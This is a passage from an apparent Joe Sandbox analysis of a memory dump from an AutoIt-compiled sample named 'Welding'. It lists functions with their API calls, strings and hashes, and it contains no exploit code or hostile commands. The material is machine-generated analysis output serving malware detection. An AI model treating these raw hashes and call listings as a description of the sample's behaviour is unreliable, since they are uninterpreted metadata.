Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 56cc02e27c0a1c93d278a17a8117eeac896515832d175886232b3f9ab81e0c8c
Instruction ID: 108d03090d7b09aee160b39e2689d4325bf157f29c646a91f96041aa62e48b12
Opcode Fuzzy Hash: 56cc02e27c0a1c93d278a17a8117eeac896515832d175886232b3f9ab81e0c8c
Instruction Fuzzy Hash: C1619831114640DFEB769F16D948BAABBF1FB44312F108528E48A6BEB0C771A8D1DF91

Function 000B2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC

GetSysColor.USER32(0000000F), ref: 000B25AF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 0292cd5362de79a0a28acd59235fd4c725514828bd518e03f2453c7e6cb59611
Instruction ID: 2f5c6c77e7a211b3f2c88b35c25ad6a4a6358ba3ac91eff2f4a8a78ff91cb430
Opcode Fuzzy Hash: 0292cd5362de79a0a28acd59235fd4c725514828bd518e03f2453c7e6cb59611
Instruction Fuzzy Hash: EC41D231104540AFDB259F29DC88BF93BA5EB0A731F194265FE669A1F2C7318C82DB21

Function 000C29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 000D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000C2A3E,?,00008000), ref: 000D0BA7

Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C2ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 000C2C2C

Part of subcall function 000C3EBE: _wcscpy.LIBCMT ref: 000C3EF6

Part of subcall function 000D386D: _iswctype.LIBCMT ref: 000D3875

Strings

Error opening the file, xrefs: 000FFD33, 000FFDAA
EA06, xrefs: 000FFD48
Unterminated string, xrefs: 001000D6
AU3!, xrefs: 000C2A93
#include depth exceeded. Make sure there are no recursive includes, xrefs: 000FFD17
Bad directive syntax error, xrefs: 0010008F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: f5555fdc7be065c52b97ed4739a591292cf3612b8327a5c05977db31405d6f2f
Instruction ID: 0ca6133a2877586065fd095b16290636680b1db55fa7544c6db902c2b380067f
Opcode Fuzzy Hash: f5555fdc7be065c52b97ed4739a591292cf3612b8327a5c05977db31405d6f2f
Instruction Fuzzy Hash: 2502BF311083419FC724EF24C891EEFBBE5AF99354F00492DF59A932A2DB70DA49CB52

Function 000C2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000C3094), ref: 000D00ED

Part of subcall function 000D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000C309F), ref: 000D08E3

RegOpenKeyExW.ADVAPI32(?,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C30E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001001BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001001FB
RegCloseKey.ADVAPI32(?), ref: 00100239
_wcscat.LIBCMT ref: 00100292

Strings

Software\AutoIt v3\AutoIt, xrefs: 000C30D8
Include, xrefs: 001001B1, 001001F2
\, xrefs: 001002B5
\Include\, xrefs: 000C309F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: e1f6b7a70e5ea9e90105dd9ade6722b8d6c335d4cadc07f274fad8941662a38a
Instruction ID: 88273f9143eb242e3e0767153543137d3b43dfc37f89a917f557c5d624935ada
Opcode Fuzzy Hash: e1f6b7a70e5ea9e90105dd9ade6722b8d6c335d4cadc07f274fad8941662a38a
Instruction Fuzzy Hash: 93716E714493019AC305EF65D889AAFBBF8FF59351F40052EF489972B2EF709984CB52

Function 0011AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00140980), ref: 0011AF4E
GetDriveTypeW.KERNEL32(00000061,0016B5F0,00000061), ref: 0011B018
_wcscpy.LIBCMT ref: 0011B042

Strings

removable, xrefs: 0011AF80
ramdisk, xrefs: 0011AFC2
all, xrefs: 0011AF54
cdrom, xrefs: 0011AF6A
network, xrefs: 0011AFAC
unknown, xrefs: 0011AFD9
fixed, xrefs: 0011AF96

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 5da5d235d94151706edc8866db2eac69f71e2f3b8c86bb1f5b2f07bc74368a22
Instruction ID: cdca5588e22fe85c1c16cefab2de57823a2bca6b353cd00683b3d93c2a1c6341
Opcode Fuzzy Hash: 5da5d235d94151706edc8866db2eac69f71e2f3b8c86bb1f5b2f07bc74368a22
Instruction Fuzzy Hash: 2451B1711083059BC318EF14C8D1AEEB7A5EF95700F50482EF496972A3DB31DE8ACA53

Function 000B4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 000B4D62
__swprintf.LIBCMT ref: 000B4DAC
__i64tow.LIBCMT ref: 000EDB3B

Strings

%.15g, xrefs: 000B4DA6
0x%p, xrefs: 000EDB1D
True, xrefs: 000EDAFC
False, xrefs: 000EDB03

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: a7bc1852a5e8e319c976590220833b3881e1f19198afbc3c973857b05d948b9e
Instruction ID: e63bf063af34244b38f5c124c8c6119c90474fae785cba1eb3948d61ed3d6bf5
Opcode Fuzzy Hash: a7bc1852a5e8e319c976590220833b3881e1f19198afbc3c973857b05d948b9e
Instruction Fuzzy Hash: 3C419271608209AFDB34DF64D842EBA73E8EB45300F24446FF549D73A3EA719A418B21

Function 00137777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0013778F
CreateMenu.USER32 ref: 001377AA
SetMenu.USER32(?,00000000), ref: 001377B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00137846
IsMenu.USER32(?), ref: 0013785C
CreatePopupMenu.USER32 ref: 00137866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00137893
DrawMenuBar.USER32 ref: 0013789B

Strings

0, xrefs: 00137785
F, xrefs: 00137887

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 5d4c5114ffd24da3102d9b9f1ec1b5d461d92a177dfdfa1b7b4b5ae1036ab640
Instruction ID: 3319b1fa6f88e70d5a33215937ebc3fb320bbaebc32ec5bfa412229853d02475
Opcode Fuzzy Hash: 5d4c5114ffd24da3102d9b9f1ec1b5d461d92a177dfdfa1b7b4b5ae1036ab640
Instruction Fuzzy Hash: F8414CB8A04209EFEB20DF65D888E9A7BF5FF49310F144469FA49A73A0D731A950DF50

Function 00137AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00137B83
CreateCompatibleDC.GDI32(00000000), ref: 00137B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00137B9D
SelectObject.GDI32(00000000,00000000), ref: 00137BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00137BB0
DeleteDC.GDI32(00000000), ref: 00137BB9
GetWindowLongW.USER32(?,000000EC), ref: 00137BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00137BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00137BE3

Strings

static, xrefs: 00137B1B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 9d7efb9085a2e2e646c9a1be0c2606ce3a58a92fd88a354d95153364f4e8c7b2
Instruction ID: 841e77c9a77961e868fe8391b51111d00fca45dbd0bc4b3bac34e41baeff7b1b
Opcode Fuzzy Hash: 9d7efb9085a2e2e646c9a1be0c2606ce3a58a92fd88a354d95153364f4e8c7b2
Instruction Fuzzy Hash: 6F318A76104218ABDF229FA5DC49FDB7B69FF0E760F110214FA59A61E0C731D860DBA0

Function 000C514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 000C5156
LoadCursorW.USER32(00000000,00007F00), ref: 000C5165
LoadIconW.USER32(00000063), ref: 000C517C
LoadIconW.USER32(000000A4), ref: 000C518E
LoadIconW.USER32(000000A2), ref: 000C51A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C51C6
RegisterClassExW.USER32(?), ref: 000C521C

Part of subcall function 000B3411: GetSysColorBrush.USER32(0000000F), ref: 000B3444
Part of subcall function 000B3411: RegisterClassExW.USER32(00000030), ref: 000B346E
Part of subcall function 000B3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
Part of subcall function 000B3411: InitCommonControlsEx.COMCTL32(?), ref: 000B349C
Part of subcall function 000B3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
Part of subcall function 000B3411: LoadIconW.USER32(000000A9), ref: 000B34C2
Part of subcall function 000B3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1

Strings

0, xrefs: 000C51FA
#, xrefs: 000C5201
AutoIt v3, xrefs: 000C520B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d131a4a2a73f98b169b528147f94eb8823d91bf13d6429951d4b7bb3a3dce386
Instruction ID: a315a7cc2690b025b2990bcee9888a7b1e4c28343014fbe1a41104d83578cf23
Opcode Fuzzy Hash: d131a4a2a73f98b169b528147f94eb8823d91bf13d6429951d4b7bb3a3dce386
Instruction Fuzzy Hash: E0214874944308AFEB119FA5ED09B9DBBB5FB08311F00012AF618A66E2D7B665D0CF84

Function 000D7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D706B

Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58

__gmtime64_s.LIBCMT ref: 000D7104
__gmtime64_s.LIBCMT ref: 000D713A
__gmtime64_s.LIBCMT ref: 000D7157
__allrem.LIBCMT ref: 000D71AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D71C9
__allrem.LIBCMT ref: 000D71E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D71FE
__allrem.LIBCMT ref: 000D7215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D7233
__invoke_watson.LIBCMT ref: 000D72A4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: b796e9befe9712c8488f0d20183929404873ba5fd8c1c014f5a0f2fb3aa0be75
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 4571D671A04756ABD7149E79CC82BAAB7E9AF54324F14423BF518E73C2F770D9408BA0

Function 00112CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00112CE9
GetMenuItemInfoW.USER32(00177890,000000FF,00000000,00000030), ref: 00112D4A
SetMenuItemInfoW.USER32(00177890,00000004,00000000,00000030), ref: 00112D80
Sleep.KERNEL32(000001F4), ref: 00112D92
GetMenuItemCount.USER32(?), ref: 00112DD6
GetMenuItemID.USER32(?,00000000), ref: 00112DF2
GetMenuItemID.USER32(?,-00000001), ref: 00112E1C
GetMenuItemID.USER32(?,?), ref: 00112E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00112EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112EDC

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 8816d6c1d8306f00ee870572465910d3d5b17972e2bf5866cf3abb0bbd9ed3fe
Instruction ID: dd5083b16990e2ac13fdb30ef8c69c759dde4033edfae03d0058fd65098ea969
Opcode Fuzzy Hash: 8816d6c1d8306f00ee870572465910d3d5b17972e2bf5866cf3abb0bbd9ed3fe
Instruction Fuzzy Hash: E561C070901249AFDF19DFA4DC88AFEBBB9EB05304F144069F851A7291D731ADE6CB21

Function 00137548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001375CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001375CD
GetWindowLongW.USER32(?,000000F0), ref: 001375F1
_memset.LIBCMT ref: 00137602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00137614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0013768C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: a430c44bc87c8db1292f6e2eb44b91e40006e3526950948de7f59c026f1abf38
Instruction ID: 54768d361fc464411909c3491d033816d2945c3753285a9ca0d27c4aa762901a
Opcode Fuzzy Hash: a430c44bc87c8db1292f6e2eb44b91e40006e3526950948de7f59c026f1abf38
Instruction Fuzzy Hash: 26618CB5904208AFDB21DFA4CC85EEE77F8EB09710F144199FA15A72E1D770AD81DB60

Function 001077B6 Relevance: 16.6, APIs: 11, Instructions: 123COMMON

Download Yara Rule

APIs

#41.OLEAUT32(0000000C,?,?,?,?,?,?,?,?,0010756E,?,?,?,?,?,0010779C), ref: 001077DD
#37.OLEAUT32(?,?,?,?,?,?,?,0010756E,?,?,?,?,?,0010779C,?,?), ref: 00107836
#8.OLEAUT32(?,?,?,?,?,?,?,0010756E,?,?,?,?,?,0010779C,?,?), ref: 00107848
#23.WSOCK32(?,?,?,?,?,?,?,?,0010756E), ref: 00107868
#10.WSOCK32(?,?,00000002,?,?,?,?,?,?,?,0010756E), ref: 001078BB
#24.OLEAUT32(?,00000002,?,?,?,?,?,?,?,0010756E), ref: 001078CF
#9.WSOCK32(?,?,?,?,?,?,?,0010756E), ref: 001078E4
#39.OLEAUT32(?,?,?,?,?,?,?,0010756E), ref: 001078F1
#38.OLEAUT32(?,?,?,?,?,?,?,0010756E), ref: 001078FA
#9.WSOCK32(?,?,?,?,?,?,?,0010756E), ref: 0010790C
#38.OLEAUT32(?,?,?,?,?,?,?,0010756E,?,?,?,?,?,0010779C,?,?), ref: 00107917

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26320f0fc6564ffb86e399f5261b8a1e51376bc3ac9071cda4d0cb535f7de2a4
Instruction ID: 522a2fc0e57c35ad31f4ace92df2a53efe1e395a0005315348f2af3d3a900204
Opcode Fuzzy Hash: 26320f0fc6564ffb86e399f5261b8a1e51376bc3ac9071cda4d0cb535f7de2a4
Instruction Fuzzy Hash: 45416335E00119DFCB01DFA5D8489EDBBB9FF08354F048469EA55A72A1C770AA85CFA0

Function 00110508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00110530
GetAsyncKeyState.USER32(000000A0), ref: 001105B1
GetKeyState.USER32(000000A0), ref: 001105CC
GetAsyncKeyState.USER32(000000A1), ref: 001105E6
GetKeyState.USER32(000000A1), ref: 001105FB
GetAsyncKeyState.USER32(00000011), ref: 00110613
GetKeyState.USER32(00000011), ref: 00110625
GetAsyncKeyState.USER32(00000012), ref: 0011063D
GetKeyState.USER32(00000012), ref: 0011064F
GetAsyncKeyState.USER32(0000005B), ref: 00110667
GetKeyState.USER32(0000005B), ref: 00110679

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 14457aac3551c13488eb70d6bf8444f71044891b6a10c7745ec10cbcd3a83294
Instruction ID: b3b10fdcb41018e86916677144c8bdb6daa74826370e5d58a884ff2bed3c330a
Opcode Fuzzy Hash: 14457aac3551c13488eb70d6bf8444f71044891b6a10c7745ec10cbcd3a83294
Instruction Fuzzy Hash: CE411974D047C96DFF7B866488143F5BEA1AB5A300F08406ED6C54B5C1EBE499D4CF92

Function 00128AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

CoInitialize.OLE32 ref: 00128AED
